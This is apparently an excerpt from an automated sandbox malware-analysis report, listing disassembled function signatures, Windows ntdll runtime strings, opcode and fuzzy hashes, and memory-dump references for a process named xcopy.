                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                  • Instruction ID: 842eb26770229b8b79f7890791acea7b4cb96ff26e1b77017a43bf2cce4fc59d
                                  • Opcode Fuzzy Hash: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                  • Instruction Fuzzy Hash: 2D511735A0131E6ADF10EAE9EC99FAD77ACAF44340F0404D9E505BB181EB719AA1CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 78d449958af5a14375954723905aa2b95dabb720f214b88744bb622d88097eaf
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 4A81E030E01A699EDF24DE68C8907FEBFFAAF443A0F1C4559D861A7799C7348840CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039502E7
                                  • RTL: Re-Waiting, xrefs: 0395031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039502BD
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                  • Instruction ID: 5dc7a7bd05cd646518945763c696c64da0a6019218730ee651b04f2f2bf0f5d1
                                  • Opcode Fuzzy Hash: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                  • Instruction Fuzzy Hash: 11E1BE316087419FD724CF28C884B2AB7E8BF84754F180A5DF8A68B3E1D774DA85CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03957B7F
                                  • RTL: Re-Waiting, xrefs: 03957BAC
                                  • RTL: Resource at %p, xrefs: 03957B8E
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                  • Instruction ID: d5324b1e4324debcc84d216ec792a0af2c773969215745e9e63ea47fa02e3e31
                                  • Opcode Fuzzy Hash: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                  • Instruction Fuzzy Hash: 0E4111353017069FD720DE69C840B6AB7EAEF88720F040A1DF85AEB780DB30E955CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0395728C
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 039572C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03957294
                                  • RTL: Resource at %p, xrefs: 039572A3
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                  • Instruction ID: 0efc26e136458058a2496efd6bf1fbd7ec908724779c011ef845aa7855f383af
                                  • Opcode Fuzzy Hash: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                  • Instruction Fuzzy Hash: E541FF3570030AABD720CE65CC41B6AB7AAFF84750F144A19FC56EB280DB31E992CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 985f398a928344f602fee8f338ce639c6e69c46f255d1b48532fe9f7018ae475
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: A291E470E04A369BDF24DEA9C8816FEBFA9FF44360F18451AE865F72D9D73089408760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                  • Instruction ID: ae28a33430ee5d3f9a6364e16834cf1b458f9baabb068ca697314bedc7cc78bd
                                  • Opcode Fuzzy Hash: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                  • Instruction Fuzzy Hash: C3813975D002699BDB31DB94CC44BEEB7B8AB49750F0445EAEA19F7280D7749E80CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0396CFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Cw@4Cw
                                  • API String ID: 4062629308-3101775584
                                  • Opcode ID: 55c02d7e58b5cd2893d9d5db1c93c17cc7c7cab568daf623b4b5ddc44bb1a95f
                                  • Instruction ID: 8ab79780ce406acb1be649480ac77f719b49c271f972305d7bca55f27a6bc51b
                                  • Opcode Fuzzy Hash: 55c02d7e58b5cd2893d9d5db1c93c17cc7c7cab568daf623b4b5ddc44bb1a95f
                                  • Instruction Fuzzy Hash: 0841BF79A01718DFCB21DFA9C940AAEBBB8FF85B00F04846AE925DF254D774C841CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%